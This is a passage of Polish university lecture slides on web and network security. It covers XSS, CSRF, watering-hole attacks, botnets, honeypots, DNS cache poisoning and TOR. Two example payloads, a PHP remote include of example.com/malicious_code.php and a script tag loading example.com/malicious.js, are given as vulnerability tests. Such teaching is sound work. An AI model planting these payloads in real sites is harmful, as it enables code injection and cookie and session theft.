include(‘http://www.example.com/malicious_code.php’)
= sukces
 Rozwiązania:

Wyłączenie… a jeśli nie to:



kontrola użycia,
aktualizacja,
śledzenie informacji o nowych podatnościach.
BSS - v2013
135
Cross Site Scripting (XSS)
Cross Site Request Forgeries (CSRF)
Non-persistent
Typowo niewinnie wyglądający URL prowadzący do zaufanej strony ale
zawierający XSS.
Jeśli zaufana strona jest podatna, po kliknięciu na link wstrzyknięty
skrypt zostanie wykonany.
 Persistent
Typowa aplikacja webowa ze stroną, w której użytkownik może
umieszczać bezpośrednio tekst:





Forums
Comments
Wikis
Reviews
Umieszczenie wpisu zwierającego JavaScript z innego serwera: <script
src=”http://www.example.com/malicious.js”></script>.
Załadowanie strony zawierającej powyższy wpis. Jeśli skrypt się wykonał
strona jest podatna.
BSS - v2013
136
Cross Site Scripting (XSS)
Cross Site Request Forgeries (CSRF)


CSRF: Jeśli występuje podatność XSS to można dzięki
obcym skryptom wykradać dane z maszyny ofiary…
np. ciasteczka, a jak intruz ma ciasteczko ma też
sesję, a gdy ma sesję może w imieniu zaufanej osoby
rozsyłać linki zawierające XSS (np. instalujące złośliwe
oprogramowanie).
Rozwiązanie:



Nigdy nie ufaj danym wprowadzanym przez user’a!
Kasuj kod JavaScript wstawiany przez user’a.
Limituj i kontroluj tagi dostępne dla user’a.
BSS - v2013
137
Insecure Communications

Brak SSL/TLS, SSH, innych…
BSS - v2013
138
Watering Hole – wodopój
BSS - v2013
139
Watering Hole – wodopój
http://niebezpiecznik.pl/post/nowy-nieznany-do-tej-pory-atak-na-internet-explorer-8/
29/12/2012
„ Kilka dni temu ktoś włamał się na stronę amerykańskiej organizacji Council on Foreign Relations
i umieścił na stronie złośliwy kod JavaScript, który przy pomocy Adobe Flasha exploituje w pełni
zapatchowane IE8 (technika heap spray)”
http://about-threats.trendmicro.com/RelatedThreats.aspx?language=au&name=Watering+Hole+101
BSS - v2013
140
Drive-by download

„Drive-by download” niezamierzone,
nieświadome pobranie softu z Internetu:


Pobranie autoryzowane przez użytkownika bez świadomości /
zrozumienia konsekwencji (pobranie i instalacja nieznanego
kodu ActiveX lub Java oraz trojany).
Pobranie bez wiedzy użytkownika: wirusy, spyware, malware,
crimeware.
BSS - v2013
141
Botnet
Botnet – zbiór węzłów sieci (hostów) zainfekowanych złośliwym
oprogramowaniem (podobnym do robaka, którego celem jest
rozprzestrzenianie, niewidocznym dla użytkownika) dającym
możliwość, jego twórcom, zdalnej kontroli nad wszystkimi
zainfekowanymi węzłami.
 Zombie – pojedynczy węzeł sieci botnet.
 Botnet = armia zombie.
 Typowe zastosowania:





rozsyłanie spamu,
ataki DDoS (Distributed Denial of Service),
kradzież poufnych informacji,
sabotaż, oszustwa, inwigilacja.
http://zaufanatrzeciastrona.pl/post/kto-i-po-co-stworzyl-jeden-z-najbardziej-skomplikowanych-botnetow-w-historii/
BSS - v2013
142
Botnet
„ NASK przejmuje domeny polskiego botnetu Virut
Virut to botnet — dzieło polskich programistów. Jego wielkość szacuje się na ok. 300 000
zainfekowanych maszyn, a botnet jest wykorzystywany do spamu, kradzieży danych i ataków
DDoS. Swoje centrum dowodzenia miał w Polsce. Do dzisiaj…
NASK właśnie poinformował, że przejął 23 polskie domeny, które wykorzystywane były w atakch
Virutem. Jest to pierwszy przypadek, w którym NASK decyduje się na tak drastyczne decyzje,
jak siłowe odebranie domeny jej właścicielowi — ale nie ulega wątpliwości, że w tym
przypadku jest to słuszna i długo wyczekiwana decyzja. NASK do tej pory, w przeciwieństwie
do innych registrarów nie nakładał żadnych sankcji na “złośliwe” domeny.
Domeny Viruta wskazują obecnie na adres 148.81.111.111 należący do NASK-u.
Z naszych informacji wynika, że już od kilku lat Virut był wnikliwie analizowany przez zespół CERT
Polska. Dzięki temu ustalono, że C&C Viruta było utrzymywane m.in. na domenach zief.pl
oraz ircgalaxy.pl, które dziś zostały wyłączone przez NASK. Techniką sinkholingu pozyskano
także informację o 890 tysiącach unikalnych adresów IP zainfekowanych Virutem
użytkowników. Na botnecie tej wielkości można uzyskać przychody rzędu 1 000 000 złotych w
skali roku.”
18/1/2013
http://niebezpiecznik.pl/post/nask-rozpoczyna-walke-z-botnetem-virut-i-przejmuje-jego-domeny/
BSS - v2013
143
Botnet
„ Kontrowersje wokół akcji Microsoftu wymierzonej w botnet Citadel
Kilka dni temu, szerokim echem odbiła się w mediach międzynarodowa operacja Microsoftu, której wynikiem było
ubicie botnetu Citadel. Botnet wykradał pieniądze z kont bankowych przy pomocy złośliwego
oprogramowania i sztuczek socjotechnicznych. Problem w tym, że oprócz przestępców stojących za botnetem
oberwali także researcherzy, a sam Microsoft demontując botnet najprawdopodobniej złamał prawo w wielu
krajach…
Microsoft rozłożył 1400 botnetów i przejął 4000 domen (sinkhollując je na swój adres IP). Akcja odbyła się
równocześnie w 80 krajach.
Niestety Microsoft przejmując domeny, przejął także kilkaset domen, które już wcześniej były przejęte i
sinkhollowane przez innych researcherów, m.in. przez ekipę abuse.ch. Po rozmowach z innymi
researcherami, okazuje się, że aż 1000 domen przejętych przez Microsoft w rzeczywistości nie należało do
właścicieli Citadela, a do różnch bezpieczników… Po akcji Microsoftu niestety nie będą one w stanie zbierać
logów, a zatem Shadowserver przestanie informować administratorów o tym, że w ich podsieciach są
zainfekowane hosty…
Co gorsza, okazuje się, że Microsoft przez swój sinkhole serwuje poprawny plik konfiguracyjny Citadela
zainfekowanym hostom, który powoduje:


zdjęcie blokady URL serwerów firm antywirusowych (to umożliwi ich aktualizację)
zmianę IP serwerów C&C na microsoftowe
Powyższe działanie pozornie korzystne dla użytkowników końcowych jest jednocześnie moralnie wątpliwe — od lat
w świecie bezpieczeństwa trwa debata, czy mając możliwość zdalnego wykonywania poleceń na
zainfekowanych komputerach powinno się je siłowo i bez zgody/świadomości właściciela leczyć?”
8/6/2013
http://niebezpiecznik.pl/post/kontrowersje-wokol-akcji-microsoftu-wymierzonej-w-botnet-citadel/
BSS - v2013
144
Honeypot






Garnce miodu (ang. honeypot)
Systemy tworzone jedynie w celu zbierania informacji o atakach na nie
przeprowadzanych – brak innych funkcji.
Początek lat 90-tych – trudne, uporczywe ataki wymagały podjęcia
dodatkowych czynności aby określić intruza.
Pierwszy publicznie dostępny honeypot: Deception Toolkit,
przeznaczony dla systemów Unix-like zestaw skryptów napisanych w
języku perl, symulujących znane usługi sieciowe wraz z wybranymi
lukami dla zachęty dla atakujących.
Powstało wiele projektów, od prostych aplikacji po rozbudowane
systemy czy nawet całe sieci komputerowe.
Współczesne honeypoty: Specter, Kfsensorczy PatriotBox (o
zamkniętym kodzie źródłowym) oraz Honeyd, Nepenthes, Dionaea czy
LaBrea (o otwartym kodzie źródłowym).
http://securitymag.pl/honeypot-miodzio/
BSS - v2013
145
Honeypot
W budowie honeypotów coraz częściej wykorzystuje się też
oprogramowanie do wirtualizacji w połączeniu z oprogramowaniem
monitorującym system i filtrującym ruch sieciowy.
 Istnieją też implementacje honeypotów dedykowane sieciom
bezprzewodowym, takie jak fake ap czy honeyspot.
 Zwykle honeypoty klasyfikuje się ze względu na stopień interakcji, czyli
na to, na ile pozwalają one atakującemu:




wysoki stopień interakcji: uruchomienie rzeczywistego systemu lub systemu opartego o
oprogramowanie do wirtualizacji, wzbogaconego o podsystem monitorowania akcji
użytkowników w sposób dla nich możliwie niezauważalny czy też gotowe rozwiązania
komercyjne jak Symantec Decoy Server, które de facto pozwalają na to samo przy
znacznie mniejszym nakładzie pracy. Wady to wysoki koszt wdrożenia oraz groźba, iż
stanie się, po przejęciu kontroli, przyczółkiem do ataku na istotne zasoby.
niski stopień interakcji: prosta aplikacja lub skrypt, nasłuchujący na wyznaczonym
porcie i symulujący działanie jakiejś usługi.
Cel: zapisywanie możliwie najwięcej danych na temat połączeń, tj.
czas, adres źródłowy, przesyłane dane itp. http://securitymag.pl/honeypot-miodzio/
BSS - v2013
146
Sandbox
Sandbox jest jednym z mechanizmów zwiększających bezpieczeństwo
poprzez separowanie uruchamianych programów.
 Często wykorzystywane do uruchamiania niezaufanego / podejrzanego
kodu / programów pochodzących od stron trzecich, dostawców,
niezaufanych użytkowników czy też stron internetowych.
 Typowo sandbox dostarcza ściśle kontrolowany zestaw zasobów
(pamięć operacyjna i dyskowa, czas procesora) potrzebny do
uruchomienia podejrzanego programu.
Tak przygotowywane środowisko jest ściśle kontrolowane, pozwala
poznać prawdziwą naturę programu. Wszelkie niebezpieczne działania
jak dostęp do sieci, urządzeń IO, systemu operacyjnego są zabronione
albo bardzo ograniczone / kontrolowane.
 Można powiedzieć, że sandbox to specyficzny przypadek wirtualizacji.

BSS - v2013
147
DNS cache poisoning

Typy serwerów:



Authoritative (autorytatywne)
Recursive (nieautorytatywne)
Podstawa działania serwerów DNS:


Jeśli serwer DNS Recursive nie zna adresu domeny
pyta o niego serwer Authoritative dla tej domeny.
Serwer Authoritative odpowiada a serwer Recursive
zapamiętuje tę odpowiedź przez określony czas i
udostępnia ją zainteresowanym.
BSS - v2013
148
DNS cache poisoning

Opis ataku:





Atakujący zasypuje atakowany serwer Recursive zapytaniami o
domeny podobne do 1q2w3e.mojbank.com.
Serwer nie zna oczywiście odpowiedzi, pyta więc serwer
Authoritative o dane domeny 1q2w3e.mojbank.com
Z odpowiedzią „spieszy” atakujący zasypując atakowany serwer
Recursive fałszywymi odpowiedziami (duża liczba zwiększa szanse
odgadnięcia numeru portu i ID w zapytaniu DNS – są to podstawowe
mechanizmy bezpieczeństwa).
Fałszywe odpowiedzi zwierają nie tylko adres dla domeny
1q2w3e.mojbank.com ale także adres fałszywego serwera DNS dla
domeny, pod którą atakujący chce się podszyć.
Teraz gdy przyjdzie zwykłe zapytanie o domenę mojbank.com
zaatakowany serwer Recursive zwróci się o podanie jej adresu do
intruza.
BSS - v2013
149
DNS cache poisoning



Bezpiecznie: gdy serwer jest Authoritative dla danej domeny.
Zagrożenie: gdy serwer jest Recursive dla danej domeny ale porty wybierane są
losowo.
Wysokie zagrożenie: gdy serwer jest Recursive dla danej domeny i porty nie są
wybierane losowo.
BSS - v2013
150
Testy penetracyjne

OWASP (Open Web Application Security Project)
„The Development Guide will show your project how to architect and build a
secure application, the Code Review Guide will tell you how to verify the
security of your application's source code, and this Testing Guide will show you
how to verify the security of your running application”
16th December, 2008 - OWASP Testing Guide, v3.0
15th February, 2013 - DRAFT New Testing Guide v4

„Na niezamówione pentesty jest paragraf
Tego typu czynności to łamanie prawa — wykonując testy bezpieczeństwa bez
zgody właściciela infrastruktury, wykonujesz je na własną odpowiedzialność i
ryzykujesz zatrzymanie przez policję nawet jeśli swoimi odkryciami za darmo i
bezinteresownie podzielisz się z właścicielem. Prawda jest taka, że “po
ujawnieniu” twój los jest całkowicie w rękach właściciela sieci, do której się
włamałeś — a łatwo jest sobie wyobrazić, jaka jest pierwsza reakcja osoby, która
dowiaduje się, że ktoś mógł np. czytać jej pocztę ;)”
http://niebezpiecznik.pl
BSS - v2013
151
TOR
TOR jest siecią składającą się z wirtualnych tuneli
implementowanych w darmowym oprogramowaniu, które
pozwala na zwiększenie prywatności i bezpieczeństwa
użytkowników.
 W rzeczywistości każdy komputer, na którym zainstalowano
oprogramowanie TOR, zachowuje się jak serwer Proxy, przy
czym wszystkie serwery należące do sieci traktowane są jako
grupa podlegająca wspólnym, ściśle określonym zasadom The
Onion Routing (ang. trasowanie cebulowe).
 Podczas połączeń zestawiane są okresowo inne za każdym razem
ścieżki, którymi wysyłane są pakiety za pośrednictwem wielu
użytkowników sieci TOR.
 Ponadto wszystkie transmisje pomiędzy poszczególnymi peerami
są osobno szyfrowane za wyjątkiem połączenia pomiędzy
ostatnim węzłem danej ścieżki, a serwerem docelowym.

BSS - v2013
152
TOR
połączenie szyfrowane
połączenie nieszyfrowane
BSS - v2013
153
TOR
Trasowanie realizowane jest w ten sposób, że każdy z węzłów biorących
udział w przesyłaniu danych w obrębie jednej ścieżki posiada informacje
jedynie o węźle, który przysłał jemu dane oraz o węźle, do którego on
sam ma je wysłać.
 Testy pokazały, że kontrolowanie tylko 4% wszystkich węzłów sieci TOR
pozwala na przechwycenie dowolnego pakietu z prawdopodobieństwem
równym 50%. Sytuacja taka jest możliwa ponieważ w przypadku dużego
ruchu sieciowego jest on kierowany do węzłów dysponujących łączem o
dużej przepustowości.
 Ponadto możliwe także do przeprowadzenia są tzw. ataki czasowe.
Zamiast starać się łamać szyfrowane połączenia lub podstawiać fałszywe
węzły wystarczy nasłuchiwać ruch w obu kierunkach wszystkich węzłów
brzegowych sieci obserwując jedynie ilość wysyłanych bądź odbieranych
danych oraz czas, w którym takie operacje mają miejsce. Dzięki temu
można ustalić zależność pomiędzy nadawcą pakietów, a ostatnim
węzłem, który przekazuje je do serwera docelowego z pewnym
opóźnieniem, a tym samym zidentyfikować klienta i jego działania w sieci.

BSS - v2013
154
TOR
„Policja rekwiruje serwery, bo są węzłami TOR-a
20 letni Austriak, William Weber, musiał się tłumaczyć na
komisariacie, że to nie on osobiście, a ktoś korzystający z
zainstalowanego na jego serwerze TOR-a wszedł na polski
serwer hostujący dziecięcą pornografię. I to tego kogoś, a nie
Wiliama, policja powinna oskarżać o dystrybucję materiałów
pedofilskich (za co grozi 10 lat więzienia).”
http://niebezpiecznik.pl/post/korzystal-z-tor-a-i-zabrali-mukomputery-przez-dziecieca-pornografie-na-polskim-serwerze/
BSS - v2013
155
TOR
NSA
„Nigdy nie będziemy w stanie deanonimizować
wszystkich użytkowników TOR-a przez cały czas”
http://niebezpiecznik.pl/post/tor-jest-bezpieczny-nsa-nie-daje-murady-ale/
BSS - v2013
156
TOR - Przykład
BSS - v2013
157
TOR - Przykład
BSS - v2013
158
TOR - Przykład
BSS - v2013
159
TOR
[Tor – anonimowość on-line, https://www.torproject.org/, 2009]
 [Tor (anonymity network),
http://en.wikipedia.org/wiki/Tor_(anonymity_network), 2009]
 [Marcin Kosedowski, Magazyn Internet, Anonimowość w sieci,
2009]
 [Steven J. Murdoch, George Danezis, University of Cambridge,
Computer Laboratory, Low-Cost Traffic Analysis of Tor, 2006]

BSS - v2013
160
BSS
KONIEC
BSS - v2013
161

BSS.w05.v2013.

Transkrypt

Podobne dokumenty

matka kombajn